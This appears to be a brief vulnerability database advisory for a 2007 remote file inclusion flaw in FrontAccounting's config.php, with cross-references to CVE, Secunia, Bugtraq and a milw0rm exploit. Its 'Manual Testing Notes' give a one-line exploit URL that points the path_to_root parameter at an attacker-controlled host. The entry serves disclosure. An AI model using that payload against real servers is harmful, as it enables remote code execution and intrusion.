FrontAccounting config.php path_to_root Variable Remote File Inclusion

2007-08-07T00:00:00
ID OSVDB:36431
Type osvdb
Reporter K3ZZAP66345()
Modified 2007-08-07T00:00:00

Description

Manual Testing Notes

http://[target]/path/config.php?path_to_root=[[attacker]]

References:

Secunia Advisory ID:26350 Other Advisory URL: http://milw0rm.com/exploits/4269 ISS X-Force ID: 35873 FrSIRT Advisory: ADV-2007-2809 CVE-2007-4279 Bugtraq ID: 25229